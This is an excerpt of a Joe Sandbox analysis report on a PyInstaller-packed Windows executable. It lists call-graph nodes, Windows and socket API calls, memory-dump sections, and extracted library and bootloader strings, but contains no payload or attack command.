63458->63491 63496 7ff72c6702d8 EnterCriticalSection 63463->63496 63475->63404 63476->63432 63488->63446 63489->63452 63490->63458 63491->63449 63492->63456 63493->63448 63494->63454 63498 7ff72c6678f8 63497->63498 63501 7ff72c6673d4 63498->63501 63500 7ff72c667911 63500->62983 63502 7ff72c66741e 63501->63502 63503 7ff72c6673ef 63501->63503 63511 7ff72c66546c EnterCriticalSection 63502->63511 63512 7ff72c66a814 37 API calls 2 library calls 63503->63512 63506 7ff72c66740f 63506->63500 63507 7ff72c667423 63508 7ff72c667440 38 API calls 63507->63508 63509 7ff72c66742f 63508->63509 63510 7ff72c665478 _fread_nolock LeaveCriticalSection 63509->63510 63510->63506 63512->63506 63514 7ff72c65fe43 63513->63514 63515 7ff72c65fe71 63513->63515 63524 7ff72c66a814 37 API calls 2 library calls 63514->63524 63522 7ff72c65fe63 63515->63522 63523 7ff72c66546c EnterCriticalSection 63515->63523 63518 7ff72c65fe88 63519 7ff72c65fea4 72 API calls 63518->63519 63520 7ff72c65fe94 63519->63520 63521 7ff72c665478 _fread_nolock LeaveCriticalSection 63520->63521 63521->63522 63522->62989 63524->63522 63525->63006 63527 7ffbaa4956e8 63528 7ffbaa4956ff 63527->63528 63532 7ffbaa49573d 63527->63532 63529 7ffbaa495712 closesocket 63528->63529 63530 7ffbaa495729 63529->63530 63531 7ffbaa495732 00007FFBC92E3440 63530->63531 63530->63532 63531->63532 63533 7ffba6815220 63534 7ffba6815258 63533->63534 63536 7ffba68152ae 63533->63536 63536->63534 63537 7ffba6814c70 63536->63537 63539 7ffba6814ce4 63537->63539 63538 7ffba6814ef4 00007FFBBB593010 63541 7ffba6814f14 63538->63541 63539->63538 63540 7ffba6814d5f 63539->63540 63539->63541 63540->63536 63542 7ffba6814fa5 00007FFBBB593010 63541->63542 63544 7ffba6814fba 63541->63544 63542->63544 63544->63540 63545 7ffba67b3790 63544->63545 63548 7ffba67b37c7 63545->63548 63546 7ffba67b3829 63546->63544 63548->63546 63549 7ffba67b3370 63548->63549 63550 7ffba67b3381 63549->63550 63551 7ffba67b33a2 63550->63551 63553 7ffba67aa0d0 63550->63553 63551->63548 63554 
7ffba67aa125 63553->63554 63556 7ffba67aa0f2 63553->63556 63554->63556 63557 7ffba67a8050 63554->63557 63556->63551 63558 7ffba67a807f 63557->63558 63559 7ffba67a809c 63558->63559 63561 7ffba679d9e0 63558->63561 63559->63556 63562 7ffba679da0d 63561->63562 63567 7ffba679da5a 63561->63567 63563 7ffba679da43 00007FFBBB593010 63562->63563 63564 7ffba679da23 00007FFBBB593010 63562->63564 63563->63567 63566 7ffba679da28 63564->63566 63565 7ffba679da83 ReadFile 63565->63566 63565->63567 63566->63559 63567->63565 63567->63566 63568 7ffbaa4953dc 63575 7ffbaa4940f0 63568->63575 63571 7ffbaa49549a 63572 7ffbaa49541c 63573 7ffbaa49544c bind 63572->63573 63574 7ffbaa49546e 63572->63574 63573->63574 63593 7ffbaa4929f0 IsProcessorFeaturePresent capture_previous_context 63574->63593 63576 7ffbaa494123 63575->63576 63579 7ffbaa4943fe 63575->63579 63577 7ffbaa49412c 63576->63577 63578 7ffbaa4942f9 63576->63578 63581 7ffbaa494285 63577->63581 63584 7ffbaa494135 63577->63584 63592 7ffbaa49413a 63578->63592 63595 7ffbaa494f74 8 API calls 63578->63595 63579->63592 63596 7ffbaa494f74 8 API calls 63579->63596 63581->63592 63594 7ffbaa494e88 00007FFBC92F4340 63581->63594 63589 7ffbaa494215 UuidFromStringW 63584->63589 63584->63592 63585 7ffbaa4944b7 63586 7ffbaa4944eb htons 63585->63586 63585->63592 63586->63592 63587 7ffbaa494382 63588 7ffbaa4943cf htons htonl 63587->63588 63587->63592 63588->63592 63590 7ffbaa49422d 63589->63590 63591 7ffbaa494258 UuidFromStringW 63590->63591 63590->63592 63591->63592 63592->63572 63593->63571 63594->63592 63595->63587 63596->63585 63597 7ffba61015a0 63598 7ffba61015b8 63597->63598 63599 7ffba61016c6 63598->63599 63601 7ffba6091c1c 63598->63601 63601->63598 63603 7ffba60d6e20 63601->63603 63604 7ffba60d6eec 63603->63604 63608 7ffba6091a0f 63603->63608 63616 7ffba60914bf 63603->63616 63620 7ffba60ef070 63603->63620 63624 7ffba6091df7 63603->63624 63604->63598 63608->63603 63609 7ffba60dab70 63608->63609 63610 7ffba60db8e1 00007FFBC92F6570 63609->63610 
63615 7ffba60dace7 63609->63615 63611 7ffba60db906 00007FFBC92F6570 63610->63611 63610->63615 63612 7ffba60db926 00007FFBC92F6570 63611->63612 63611->63615 63613 7ffba60db93d 00007FFBC92F6570 63612->63613 63612->63615 63614 7ffba60db957 00007FFBC92F6570 63613->63614 63613->63615 63614->63615 63615->63603 63616->63603 63617 7ffba60ee960 63616->63617 63618 7ffba60ef1c1 SetLastError 63617->63618 63619 7ffba60ef1d5 63617->63619 63618->63619 63619->63603 63621 7ffba60ef180 63620->63621 63622 7ffba60ef1c1 SetLastError 63621->63622 63623 7ffba60ef1d5 63621->63623 63622->63623 63623->63603 63624->63603 63625 7ffba60eeaa0 63624->63625 63626 7ffba60ef1c1 SetLastError 63625->63626 63627 7ffba60ef1d5 63625->63627 63626->63627 63627->63603 63628 7ffba67a1230 GetSystemInfo 63629 7ffba67a1264 63628->63629 63630 7ffbaa495754 63631 7ffbaa4940f0 14 API calls 63630->63631 63632 7ffbaa495794 63631->63632 63636 7ffbaa4957ce 63632->63636 63637 7ffbaa4947a0 63632->63637 63634 7ffbaa4957ed 63651 7ffbaa4929f0 IsProcessorFeaturePresent capture_previous_context 63636->63651 63638 7ffbaa499568 63637->63638 63639 7ffbaa4947c4 connect 63638->63639 63640 7ffbaa4947e2 63639->63640 63641 7ffbaa494826 63640->63641 63642 7ffbaa4947ea WSAGetLastError WSAGetLastError 63640->63642 63641->63636 63644 7ffbaa494803 63642->63644 63643 7ffbaa494816 63643->63641 63645 7ffbaa49481b WSASetLastError 63643->63645 63644->63641 63644->63643 63646 7ffbaa49483e 63644->63646 63645->63641 63647 7ffbaa494873 63646->63647 63648 7ffbaa49485a 63646->63648 63650 7ffbaa4954ac 10 API calls 63647->63650 63649 7ffbaa4954ac 10 API calls 63648->63649 63649->63641 63650->63641 63651->63634 63652 7ffbaa496654 63653 7ffbaa4966a5 63652->63653 63655 7ffbaa4966b3 63653->63655 63656 7ffbaa4965ac 63653->63656 63657 7ffbaa4965b5 63656->63657 63658 7ffbaa4965b9 63656->63658 63657->63655 63659 7ffbaa4954ac 10 API calls 63658->63659 63659->63657 63660 7ff72c665628 63661 7ff72c66565f 63660->63661 63662 7ff72c665642 63660->63662 63661->63662 
63664 7ff72c665672 CreateFileW 63661->63664 63685 7ff72c664ee8 11 API calls _get_daylight 63662->63685 63666 7ff72c6656dc 63664->63666 63667 7ff72c6656a6 63664->63667 63665 7ff72c665647 63686 7ff72c664f08 11 API calls _get_daylight 63665->63686 63689 7ff72c665c04 46 API calls 3 library calls 63666->63689 63688 7ff72c66577c 59 API calls 3 library calls 63667->63688 63671 7ff72c6656e1 63674 7ff72c6656e5 63671->63674 63675 7ff72c665710 63671->63675 63672 7ff72c66564f 63687 7ff72c66a8e0 37 API calls _invalid_parameter_noinfo 63672->63687 63673 7ff72c6656b4 63677 7ff72c6656bb CloseHandle 63673->63677 63678 7ff72c6656d1 CloseHandle 63673->63678 63690 7ff72c664e7c 11 API calls 2 library calls 63674->63690 63691 7ff72c6659c4 51 API calls 63675->63691 63681 7ff72c66565a 63677->63681 63678->63681 63682 7ff72c66571d 63692 7ff72c665b00 21 API calls _fread_nolock 63682->63692 63684 7ff72c6656ef 63684->63681 63685->63665 63686->63672 63687->63681 63688->63673 63689->63671 63690->63684 63691->63682 63692->63684 63693 7ffba66a91b8 63696 7ffba66a91c0 63693->63696 63694 7ffba66a91fc 63696->63694 63697 7ffba66a44e4 2 API calls 63696->63697 63698 7ffba66a4c3c WSAGetLastError 63696->63698 63697->63696 63698->63696 63699 7ffba43e1f40 63700 7ffba43e1f58 63699->63700 63707 7ffba43e2b20 63699->63707 63701 7ffba43e2a43 LoadLibraryA 63700->63701 63703 7ffba43e2a92 VirtualProtect VirtualProtect 63700->63703 63702 7ffba43e2a5d 63701->63702 63702->63700 63705 7ffba43e2a66 GetProcAddress 63702->63705 63703->63707 63705->63702 63706 7ffba43e2a87 63705->63706 63707->63707 63717 7ffba60b8150 63718 7ffba60b816a 63717->63718 63719 7ffba60b8180 63718->63719 63721 7ffba609112c 63718->63721 63721->63719 63722 7ffba609ef00 63721->63722 63725 7ffba609ef30 63722->63725 63724 7ffba609ef1a 63724->63719 63726 7ffba6091325 63725->63726 63727 7ffba609ef50 SetLastError 63726->63727 63728 7ffba609ef70 63727->63728 63730 7ffba6091c1c 8 API calls 63728->63730 63729 7ffba609efac 63729->63724 63730->63729 63731 
7ffba60d5c00 63732 7ffba60d5c1d 63731->63732 63733 7ffba60d5d23 63732->63733 63735 7ffba60d5d3e 63732->63735 63734 7ffba609127b SetLastError 63733->63734 63736 7ffba60d5d39 63734->63736 63735->63736 63738 7ffba609127b 63735->63738 63738->63736 63740 7ffba60d8a40 63738->63740 63739 7ffba60d8ac3 SetLastError 63739->63740 63741 7ffba60d8b27 63739->63741 63740->63739 63740->63741 63741->63736 63742 7ffba67f0d10 63743 7ffba67f0d3c 63742->63743 63745 7ffba67f0d41 63742->63745 63746 7ffba6814960 63743->63746 63747 7ffba6814979 63746->63747 63749 7ffba6814985 63746->63749 63750 7ffba6814890 63747->63750 63749->63745 63751 7ffba68148ca 63750->63751 63754 7ffba68148da 63750->63754 63756 7ffba68143d0 63751->63756 63753 7ffba681492d 63753->63749 63754->63753 63755 7ffba68143d0 4 API calls 63754->63755 63755->63754 63757 7ffba681448c 63756->63757 63758 7ffba67b3790 3 API calls 63757->63758 63759 7ffba68144ba 63757->63759 63760 7ffba6814514 63758->63760 63759->63754 63760->63759 63761 7ffba681454f 00007FFBBB593010 63760->63761 63761->63759 63762 7ff72c65bae0 63763 7ff72c65bb0e 63762->63763 63764 7ff72c65baf5 63762->63764 63764->63763 63767 7ff72c66d5fc 63764->63767 63768 7ff72c66d647 63767->63768 63772 7ff72c66d60b _get_daylight 63767->63772 63775 7ff72c664f08 11 API calls _get_daylight 63768->63775 63769 7ff72c66d62e HeapAlloc 63771 7ff72c65bb6e 63769->63771 63769->63772 63772->63768 63772->63769 63774 7ff72c673590 EnterCriticalSection LeaveCriticalSection _get_daylight 63772->63774 63774->63772 63775->63771 63776 7ffbaa4910c0 WSAStartup 63777 7ffbaa491102 00007FFBAA6A082C 63776->63777 63780 7ffbaa49283e 63776->63780 63781 7ffbaa491135 63777->63781 63779 7ffbaa492850 63785 7ffbaa4929f0 IsProcessorFeaturePresent capture_previous_context 63780->63785 63781->63780 63782 7ffbaa4927a7 VerSetConditionMask VerSetConditionMask VerSetConditionMask 63781->63782 63783 7ffbaa4927f7 VerifyVersionInfoA 63782->63783 63783->63780 63784 7ffbaa492814 63783->63784 63784->63780 63784->63783 
63785->63779 63786 7ff72c652fe0 63787 7ff72c652ff0 63786->63787 63788 7ff72c65302b 63787->63788 63789 7ff72c653041 63787->63789 63814 7ff72c652710 54 API calls _log10_special 63788->63814 63791 7ff72c653061 63789->63791 63802 7ff72c653077 __std_exception_copy 63789->63802 63815 7ff72c652710 54 API calls _log10_special 63791->63815 63793 7ff72c65c550 _log10_special 8 API calls 63795 7ff72c6531fa 63793->63795 63794 7ff72c653037 __std_exception_copy 63794->63793 63796 7ff72c651470 116 API calls 63796->63802 63797 7ff72c653349 63822 7ff72c652710 54 API calls _log10_special 63797->63822 63798 7ff72c651c80 49 API calls 63798->63802 63800 7ff72c653333 63821 7ff72c652710 54 API calls _log10_special 63800->63821 63802->63794 63802->63796 63802->63797 63802->63798 63802->63800 63803 7ff72c65330d 63802->63803 63805 7ff72c653207 63802->63805 63820 7ff72c652710 54 API calls _log10_special 63803->63820 63806 7ff72c653273 63805->63806 63816 7ff72c66a404 37 API calls 2 library calls 63805->63816 63808 7ff72c65329e 63806->63808 63809 7ff72c653290 63806->63809 63818 7ff72c652dd0 37 API calls 63808->63818 63817 7ff72c66a404 37 API calls 2 library calls 63809->63817 63812 7ff72c65329c 63819 7ff72c652500 54 API calls __std_exception_copy 63812->63819 63814->63794 63815->63794 63816->63806 63817->63812 63818->63812 63819->63794 63820->63794 63821->63794 63822->63794 63823 7ffbaa4b7700 63824 7ffbaa4b7719 63823->63824 63825 7ffbaa4b777a 00007FFBAA5AD8D8 63823->63825 63828 7ffbaa4b7a80 63824->63828 63825->63824 63827 7ffbaa4b7722 63829 7ffbaa4b7a85 63828->63829 63830 7ffbaa4b7aac 63828->63830 63829->63830 63831 7ffbaa4b7a24 00007FFBC92DF020 63829->63831 63830->63827 63832 7ffbaa4b7a9f 63831->63832 63833 7ffbaa4b7b7c 00007FFBC92DF020 63832->63833 63833->63830 63834 7ffba60afd40 63835 7ffba60afd50 63834->63835 63836 7ffba60afd62 63835->63836 63837 7ffba6091df7 SetLastError 63835->63837 63838 7ffba60ef070 SetLastError 63835->63838 63839 7ffba60914bf SetLastError 63835->63839 63837->63836 
63838->63836 63839->63836 63840 7ffba67b2250 63844 7ffba67b22ab 63840->63844 63841 7ffba67b2408 63846 7ffba67b23c4 63841->63846 63848 7ffba67a92b0 63841->63848 63843 7ffba67b2665 63843->63846 63847 7ffba679d9e0 3 API calls 63843->63847 63844->63841 63845 7ffba67b23fd 00007FFBBB593010 63844->63845 63844->63846 63845->63841 63847->63846 63849 7ffba67a9335 63848->63849 63857 7ffba67a9390 63848->63857 63850 7ffba67a95c2 63849->63850 63852 7ffba67a9375 00007FFBBB593010 63849->63852 63849->63857 63850->63843 63851 7ffba67a9455 00007FFBBB593010 63853 7ffba67a9477 00007FFBBB593010 63851->63853 63854 7ffba67a962b 63851->63854 63852->63857 63855 7ffba67a962e 00007FFBBB593010 00007FFBBB593010 63853->63855 63854->63855 63856 7ffba67a9679 63855->63856 63856->63850 63859 7ffba679ffd0 63856->63859 63857->63850 63857->63851 63857->63856 63857->63857 63861 7ffba67a0021 63859->63861 63860 7ffba67a01f0 CreateFileW 63860->63861 63861->63860 63862 7ffba67a03a8 63861->63862 63862->63850
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
• Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
Similarity
• API ID: ConditionMask$00007A082InfoStartupVerifyVersion
                                                                                                                                                                                                                                  • String ID: 00000000-0000-0000-0000-000000000000$00:00:00:00:00:00$00:00:00:FF:FF:FF$90DB8B89-0D35-4F79-8CE9-49EA0AC8B7CD$A42E7CDA-D03F-480C-9CC2-A4DE20ABB878$AF_APPLETALK$AF_BLUETOOTH$AF_DECnet$AF_HYPERV$AF_INET$AF_INET6$AF_IPX$AF_IRDA$AF_LINK$AF_SNA$AF_UNSPEC$AI_ADDRCONFIG$AI_ALL$AI_CANONNAME$AI_NUMERICHOST$AI_NUMERICSERV$AI_PASSIVE$AI_V4MAPPED$BDADDR_ANY$BDADDR_LOCAL$BTPROTO_RFCOMM$CAPI$E0E16197-DD56-4A10-9195-5EE7A155A838$EAI_AGAIN$EAI_BADFLAGS$EAI_FAIL$EAI_FAMILY$EAI_MEMORY$EAI_NODATA$EAI_NONAME$EAI_SERVICE$EAI_SOCKTYPE$FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF$HVSOCKET_ADDRESS_FLAG_PASSTHRU$HVSOCKET_CONNECTED_SUSPEND$HVSOCKET_CONNECT_TIMEOUT$HVSOCKET_CONNECT_TIMEOUT_MAX$HV_GUID_BROADCAST$HV_GUID_CHILDREN$HV_GUID_LOOPBACK$HV_GUID_PARENT$HV_GUID_WILDCARD$HV_GUID_ZERO$HV_PROTOCOL_RAW$INADDR_ALLHOSTS_GROUP$INADDR_ANY$INADDR_BROADCAST$INADDR_LOOPBACK$INADDR_MAX_LOCAL_GROUP$INADDR_NONE$INADDR_UNSPEC_GROUP$IPPORT_RESERVED$IPPORT_USERRESERVED$IPPROTO_AH$IPPROTO_CBT$IPPROTO_DSTOPTS$IPPROTO_EGP$IPPROTO_ESP$IPPROTO_FRAGMENT$IPPROTO_GGP$IPPROTO_HOPOPTS$IPPROTO_ICLFXBM$IPPROTO_ICMP$IPPROTO_ICMPV6$IPPROTO_IDP$IPPROTO_IGMP$IPPROTO_IGP$IPPROTO_IP$IPPROTO_IPV4$IPPROTO_IPV6$IPPROTO_L2TP$IPPROTO_MAX$IPPROTO_ND$IPPROTO_NONE$IPPROTO_PGM$IPPROTO_PIM$IPPROTO_PUP$IPPROTO_RAW$IPPROTO_RDP$IPPROTO_ROUTING$IPPROTO_SCTP$IPPROTO_ST$IPPROTO_TCP$IPPROTO_UDP$IPV6_CHECKSUM$IPV6_DONTFRAG$IPV6_HOPLIMIT$IPV6_HOPOPTS$IPV6_JOIN_GROUP$IPV6_LEAVE_GROUP$IPV6_MULTICAST_HOPS$IPV6_MULTICAST_IF$IPV6_MULTICAST_LOOP$IPV6_PKTINFO$IPV6_RECVRTHDR$IPV6_RECVTCLASS$IPV6_RTHDR$IPV6_TCLASS$IPV6_UNICAST_HOPS$IPV6_V6ONLY$IP_ADD_MEMBERSHIP$IP_ADD_SOURCE_MEMBERSHIP$IP_BLOCK_SOURCE$IP_DROP_MEMBERSHIP$IP_DROP_SOURCE_MEMBERSHIP$IP_HDRINCL$IP_MULTICAST_IF$IP_MULTICAST_LOOP$IP_MULTICAST_TTL$IP_OPTIONS$IP_P
KTINFO$IP_RECVDSTADDR$IP_RECVTOS$IP_TOS$IP_TTL$IP_UNBLOCK_SOURCE$MSG_BCAST$MSG_CTRUNC$MSG_DONTROUTE$MSG_ERRQUEUE$MSG_MCAST$MSG_OOB$MSG_PEEK$MSG_TRUNC$MSG_WAITALL$NI_DGRAM$NI_MAXHOST$NI_MAXSERV$NI_NAMEREQD$NI_NOFQDN$NI_NUMERICHOST$NI_NUMERICSERV$RCVALL_MAX$RCVALL_OFF$RCVALL_ON$RCVALL_SOCKETLEVELONLY$SHUT_RD$SHUT_RDWR$SHUT_WR$SIO_KEEPALIVE_VALS$SIO_LOOPBACK_FAST_PATH$SIO_RCVALL$SOCK_DGRAM$SOCK_RAW$SOCK_RDM$SOCK_SEQPACKET$SOCK_STREAM$SOL_IP$SOL_SOCKET$SOL_TCP$SOL_UDP$SOMAXCONN$SO_ACCEPTCONN$SO_BROADCAST$SO_DEBUG$SO_DONTROUTE$SO_ERROR$SO_EXCLUSIVEADDRUSE$SO_KEEPALIVE$SO_LINGER$SO_OOBINLINE$SO_RCVBUF$SO_RCVLOWAT$SO_RCVTIMEO$SO_REUSEADDR$SO_SNDBUF$SO_SNDLOWAT$SO_SNDTIMEO$SO_TYPE$SO_USELOOPBACK$SocketType$TCP_FASTOPEN$TCP_KEEPCNT$TCP_KEEPIDLE$TCP_KEEPINTVL$TCP_MAXSEG$TCP_NODELAY$WSAStartup failed: error code %d$WSAStartup failed: network not ready$WSAStartup failed: requested version not supported$_socket.CAPI$error$gaierror$has_ipv6$herror$socket.gaierror$socket.herror$timeout
• API String ID: 3409425757-1188461360
• Opcode ID: 4dce1cfbc17b3c99d7e4a2bf2870c05e4680d8e1b4ef0cfb511a93ced94c5d55
• Instruction ID: 13a80daa33a126a4a18bef59b45fe4f6377ff81a0f080e7532bd6014b26a58b3
• Opcode Fuzzy Hash: 4dce1cfbc17b3c99d7e4a2bf2870c05e4680d8e1b4ef0cfb511a93ced94c5d55
• Instruction Fuzzy Hash: 7FD202A0B0A713C1F6128F36E8C06AD175C9F46F94F8415B9ED0E46261DF6EE26BC361
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ConditionMask$00007A082InfoStartupVerifyVersion
• String ID: 00000000-0000-0000-0000-000000000000$00:00:00:00:00:00$00:00:00:FF:FF:FF$90DB8B89-0D35-4F79-8CE9-49EA0AC8B7CD$A42E7CDA-D03F-480C-9CC2-A4DE20ABB878$AF_APPLETALK$AF_BLUETOOTH$AF_DECnet$AF_HYPERV$AF_INET$AF_INET6$AF_IPX$AF_IRDA$AF_LINK$AF_SNA$AF_UNSPEC$AI_ADDRCONFIG$AI_ALL$AI_CANONNAME$AI_NUMERICHOST$AI_NUMERICSERV$AI_PASSIVE$AI_V4MAPPED$BDADDR_ANY$BDADDR_LOCAL$BTPROTO_RFCOMM$CAPI$E0E16197-DD56-4A10-9195-5EE7A155A838$EAI_AGAIN$EAI_BADFLAGS$EAI_FAIL$EAI_FAMILY$EAI_MEMORY$EAI_NODATA$EAI_NONAME$EAI_SERVICE$EAI_SOCKTYPE$FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF$HVSOCKET_ADDRESS_FLAG_PASSTHRU$HVSOCKET_CONNECTED_SUSPEND$HVSOCKET_CONNECT_TIMEOUT$HVSOCKET_CONNECT_TIMEOUT_MAX$HV_GUID_BROADCAST$HV_GUID_CHILDREN$HV_GUID_LOOPBACK$HV_GUID_PARENT$HV_GUID_WILDCARD$HV_GUID_ZERO$HV_PROTOCOL_RAW$INADDR_ALLHOSTS_GROUP$INADDR_ANY$INADDR_BROADCAST$INADDR_LOOPBACK$INADDR_MAX_LOCAL_GROUP$INADDR_NONE$INADDR_UNSPEC_GROUP$IPPORT_RESERVED$IPPORT_USERRESERVED$IPPROTO_AH$IPPROTO_CBT$IPPROTO_DSTOPTS$IPPROTO_EGP$IPPROTO_ESP$IPPROTO_FRAGMENT$IPPROTO_GGP$IPPROTO_HOPOPTS$IPPROTO_ICLFXBM$IPPROTO_ICMP$IPPROTO_ICMPV6$IPPROTO_IDP$IPPROTO_IGMP$IPPROTO_IGP$IPPROTO_IP$IPPROTO_IPV4$IPPROTO_IPV6$IPPROTO_L2TP$IPPROTO_MAX$IPPROTO_ND$IPPROTO_NONE$IPPROTO_PGM$IPPROTO_PIM$IPPROTO_PUP$IPPROTO_RAW$IPPROTO_RDP$IPPROTO_ROUTING$IPPROTO_SCTP$IPPROTO_ST$IPPROTO_TCP$IPPROTO_UDP$IPV6_CHECKSUM$IPV6_DONTFRAG$IPV6_HOPLIMIT$IPV6_HOPOPTS$IPV6_JOIN_GROUP$IPV6_LEAVE_GROUP$IPV6_MULTICAST_HOPS$IPV6_MULTICAST_IF$IPV6_MULTICAST_LOOP$IPV6_PKTINFO$IPV6_RECVRTHDR$IPV6_RECVTCLASS$IPV6_RTHDR$IPV6_TCLASS$IPV6_UNICAST_HOPS$IPV6_V6ONLY$IP_ADD_MEMBERSHIP$IP_ADD_SOURCE_MEMBERSHIP$IP_BLOCK_SOURCE$IP_DROP_MEMBERSHIP$IP_DROP_SOURCE_MEMBERSHIP$IP_HDRINCL$IP_MULTICAST_IF$IP_MULTICAST_LOOP$IP_MULTICAST_TTL$IP_OPTIONS$IP_PKTINFO$IP_RECVDSTADDR$IP_RECVTOS$IP_TOS$IP_TTL$IP_UNBLOCK_SOURCE$MSG_BCAST$MSG_CTRUNC$MSG_DONTROUTE$MSG_ERRQUEUE$MSG_MCAST$MSG_OOB$MSG_PEEK$MSG_TRUNC$MSG_WAITALL$NI_DGRAM$NI_MAXHOST$NI_MAXSERV$NI_NAMEREQD$NI_NOFQDN$NI_NUMERICHOST$NI_NUMERICSERV$RCVALL_MAX$RCVALL_OFF$RCVALL_ON$RCVALL_SOCKETLEVELONLY$SHUT_RD$SHUT_RDWR$SHUT_WR$SIO_KEEPALIVE_VALS$SIO_LOOPBACK_FAST_PATH$SIO_RCVALL$SOCK_DGRAM$SOCK_RAW$SOCK_RDM$SOCK_SEQPACKET$SOCK_STREAM$SOL_IP$SOL_SOCKET$SOL_TCP$SOL_UDP$SOMAXCONN$SO_ACCEPTCONN$SO_BROADCAST$SO_DEBUG$SO_DONTROUTE$SO_ERROR$SO_EXCLUSIVEADDRUSE$SO_KEEPALIVE$SO_LINGER$SO_OOBINLINE$SO_RCVBUF$SO_RCVLOWAT$SO_RCVTIMEO$SO_REUSEADDR$SO_SNDBUF$SO_SNDLOWAT$SO_SNDTIMEO$SO_TYPE$SO_USELOOPBACK$SocketType$TCP_FASTOPEN$TCP_KEEPCNT$TCP_KEEPIDLE$TCP_KEEPINTVL$TCP_MAXSEG$TCP_NODELAY$_socket.CAPI$error$gaierror$has_ipv6$herror$socket.gaierror$socket.herror$timeout
• API String ID: 3409425757-3643889990
• Opcode ID: 402a8c535e09a4f8d89ed768b117a8b9010c23cdf2382df9e6d88d85c51fdd0b
• Instruction ID: 45e393286e2def3153e33a02d52c4f757555e515654a6cc8226df130892a5d8e
• Opcode Fuzzy Hash: 402a8c535e09a4f8d89ed768b117a8b9010c23cdf2382df9e6d88d85c51fdd0b
• Instruction Fuzzy Hash: 7EC202A0B0A713C1F6128F36E8C06AD175C9F45F94F8415B9ED0E46261DF6EE26BC361

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
• Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
Similarity
• API ID: ErrorFileLastModuleName
• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
• API String ID: 2776309574-3273434969
• Opcode ID: 233ec7f25ec1ed803ce179537cd482b57a2e4efc6b2dbb8e538fcab84ef42543
• Instruction ID: 622d26e9a56d379b62f4068e735e4b703384393e3ae7f8cd4b57c91dcd2d8ece
• Opcode Fuzzy Hash: 233ec7f25ec1ed803ce179537cd482b57a2e4efc6b2dbb8e538fcab84ef42543
• Instruction Fuzzy Hash: 49329F21A0C68251FA17F7249C552B9A7A3FF64BE0FE84436DB4D426C6DF2CE558CB20
Strings
Memory Dump Source
• Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
• Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmp
• Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
Similarity
• API ID:
• String ID: $..\s\ssl\record\ssl3_record.c$CONNE$GET $HEAD $POST $PUT $ssl3_get_record
• API String ID: 0-2781224710
• Opcode ID: bfd61e0b9a574f603b0776d19a675c1a396b8c51785310e0fbd2dcc6b7e53aed
• Instruction ID: 72d3d99a3432094acccdd1da89d78c8214b8e2d5f3828977d1f0af4d5972e644
• Opcode Fuzzy Hash: bfd61e0b9a574f603b0776d19a675c1a396b8c51785310e0fbd2dcc6b7e53aed
